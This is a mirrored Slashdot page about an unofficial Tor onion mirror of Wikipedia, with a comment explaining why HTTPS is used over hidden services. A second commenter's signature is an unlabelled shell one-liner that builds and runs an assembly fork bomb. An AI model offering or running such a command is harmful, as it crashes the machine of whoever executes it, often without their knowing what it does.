Slashdot Mirror

← Back to Stories (view on slashdot.org)

There's Now a Dark Web Version of Wikipedia (vice.com)

Posted by msmash on from the better-than-nothing dept.

An anonymous reader shares a report: In many parts of the world, like North America, using Wikipedia is taken for granted; hell, there are even Twitter accounts to track government employees editing the internet's free encyclopedia while on the clock. But in other places, like Turkey or Syria, using Wikipedia can be difficult, and even dangerous. To make using Wikipedia safer for at-risk users, former Facebook security engineer Alec Muffett has started an experimental dark net Wikipedia service that gives visitors some strong privacy protections. The project is unofficial; for now, Wikipedia isn't involved. So it's a bit janky. The service uses self-signed certificates that may trigger a security warning in Tor, so you have to manually white-list the addresses, which takes a couple minutes.

2 of 20 comments (clear)

  1. Secure Contexts by tepples · · Score: 5, Informative

    using https over tor is just stupid.

    I can see two main reason why a site operator might try using HTTPS to connect to a web server over an otherwise secure channel, such as a hidden service on Tor or I2P.*

    One reason is that not all parts of all browsers are aware that hidden services are secure channels. The W3C has published a spec titled Secure Contexts, which recommends that web browsers block use of sensitive JavaScript APIs by non-secure sites. Even script-free sites cause the browser to show a warning about an insecure context if a document contains a form, such as a login form or an editing form. Until user agents start treating hidden services (*.i2p and *.onion) as potentially trustworthy origins, sites using these APIs must use HTTPS to build a secure context.

    Another reason relates to typosquatting. If a user mistypes a hidden service's hostname, such as facebookcorewwwi.onion, the user might end up connecting to a server controlled by an entity other than Facebook. To fight this, some certificate authorities have begun to offer Extended Validation certificates that apply to hidden services, assuring the user of the real-world identity of a hidden service's operator.

    * The I2P community refers to hidden services as "eepsites".

  2. Highly informative Daily Mash article on Darknet by Hal_Porter · · Score: 1, Informative

    http://www.thedailymash.co.uk/...

    --
    echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;